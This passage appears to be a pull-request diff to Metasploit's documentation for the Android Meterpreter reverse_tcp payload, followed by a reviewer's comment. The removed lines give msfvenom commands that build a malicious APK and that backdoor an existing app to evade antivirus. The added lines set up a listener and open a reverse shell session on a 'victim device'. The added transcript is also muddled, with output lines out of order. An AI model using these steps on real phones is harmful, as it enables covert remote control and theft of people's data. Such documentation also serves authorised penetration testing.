documentation/modules/payload/android/meterpreter/reverse_tcp.md

```diff
@@ -28,40 +52,31 @@ get to test it over a real network.
 ## Verification Steps
 
 Currently, the most common way to use Android Meterpreter is to create it as an APK, and then
-execute it.
+execute it in victim device.
 
-To create the APK with msfconsole:
+To start listner run msfconsole in terminal and then set listner settings:
 
 ```
-msf > use payload/android/meterpreter/reverse_tcp 
+msf > use exploit/multi/handler
+msf > set payload/android/meterpreter/reverse_tcp 
 msf payload(reverse_tcp) > set LHOST 192.168.1.199
 LHOST => 192.168.1.199
-msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk
+msf payload(reverse_tcp) > run -j
 [*] Writing 8992 bytes to /tmp/android.apk...
-msf payload(reverse_tcp) >
-```
-
-### To create the APK with msfvenom:
-
-```
-./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
-```
-
-### To inject meterpreter into an existing APK with msfvenom:
-
-You can also add Android meterpreter to any existing APK. This will make it harder for
-Anti-virus software to detect the payload, and allow you read internal files and take
-screenshots of the Android app that you are backdooring:
+msf payload(reverse_tcp) > sessions    (To check which session is running type: 'sessions', in my case it is 1)
+  ID  Name  Type                           Information   Connection
+  __  ____  ___                            ___________   __________
+  1       android/meterpreter/reverse_tcp  u0_localhost  192.168.1.199:4444=> 192.168.0.110:35713
+  
+  
+msf payload(reverse_tcp) > sessions -i 1   (To set the session to proceed the attack)
+[*] Started reverse TCP handler on 192.168.1.199:4444 
+[*] Starting the payload handler...
+[*] Sending stage (62432 bytes) to 192.168.1.199
+[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.199:49178) at 2016-03-08 13:00:10 -0600
 
+meterpreter > 
 ```
```

Comment:
If I'm being honest I'm a little confused on this change. There doesn't seem to be much changed here other than reformatting it to your personal preference? Near as I can tell the only difference in this PR has been the addition of the BlueStacks link, the rest has just been reorganizing the wording into different areas.